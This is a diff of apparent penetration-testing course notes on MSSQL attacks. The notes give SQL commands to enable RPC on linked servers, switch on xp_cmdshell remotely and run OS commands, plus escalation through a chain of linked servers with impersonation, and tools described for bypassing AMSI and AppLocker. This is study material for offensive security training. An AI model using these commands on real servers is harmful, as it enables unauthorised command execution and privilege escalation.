trike33/PEN-300-Code-Snippets/MSSQL Advanced Attacks.md

 ```
 1. EXEC sp_serveroption 'LOCALHOST\instance', 'rpc', true;

+#From an sqlcmd(example)
+EXEC sp_serveroption 'DC01', 'rpc', true;
+GO

 2. EXEC sp_serveroption 'LOCALHOST\instance', 'rpc out', true;

+#From impacket-mssqlclient(example)
+EXEC sp_serveroption 'DC01', 'rpc out', true;
 ```

 ```
-1st EXEC (sp_configure 'show advanced options', 1; RECONFIGURE;) AT dc01
+1st EXEC (sp_configure 'show advanced options', 1; RECONFIGURE;) AT DC01

-2nd EXEC (sp_configure 'xp_cmdshell', 1; RECONFIGURE;) AT dc01
+2nd EXEC (sp_configure 'xp_cmdshell', 1; RECONFIGURE;) AT DC01

-3rd EXEC (xp_cmdshell 'whoami';) AT dc01
+3rd EXEC (xp_cmdshell 'whoami';) AT DC01
 ```

+Obiously, to be able to get code execution in the linked MSSQL server we must have the sysadmin role, which it is controlled by the "Security context" or from our SQL login.

 **PRIVILEGE ESCALATION THROUGHA LINKED MSSQLSERVER:**

-Supose that we have low privileges on our current MSSQL server, however there is a linked MSSQL server where we do have high privileges.
-So how do we do to gain high privileges on our first MSSQL server?
+Supose that we have low privileges on our current MSSQL server(APPSRV01), however there is a linked MSSQL server(DC01) which have a link to APPSRV01 configured with impersonation(the link of DC01 to APPSRV01).
-(For demonstration purposes we have low privileges on dc01 but high privileges on appsrv01)

 Here are the commands we must throw through dc01:

 ```
-1st EXEC ('EXEC (sp_configure "show advanced options", 1; reconfigure;  ) AT appsrv01') AT dc01
+1st EXEC ('EXEC (sp_configure "show advanced options", 1; reconfigure;) AT appsrv01') AT dc01

 2nd EXEC ('EXEC (sp_configure "xp_cmdshell", 1; reconfigure;) AT appsrv01') AT dc01

 3rd EXEC ('EXEC (xp_cmdshell "whoami";) AT appsrv01') AT dc01
 ```

+**USEFUL SCRIPTS:**

+[PowerUpSQL](https://github.com/NetSPI/PowerUpSQL/tree/master), is written in PowerShell, could be useful after bypassing AMSI and disabling signatures.

+[DAFT](https://github.com/NetSPI/DAFT/tree/master) it is like an "enhanced" sqlcmd.
+It is an EXE.
+It is a C# implementation of PowerUpSQL.

+[ESC](https://github.com/NetSPI/ESC) it is like DAFT, but it has designed to work with msbuild which could help for bypassing AppLocker.
+It can also be invoked using PowerShell Reflection.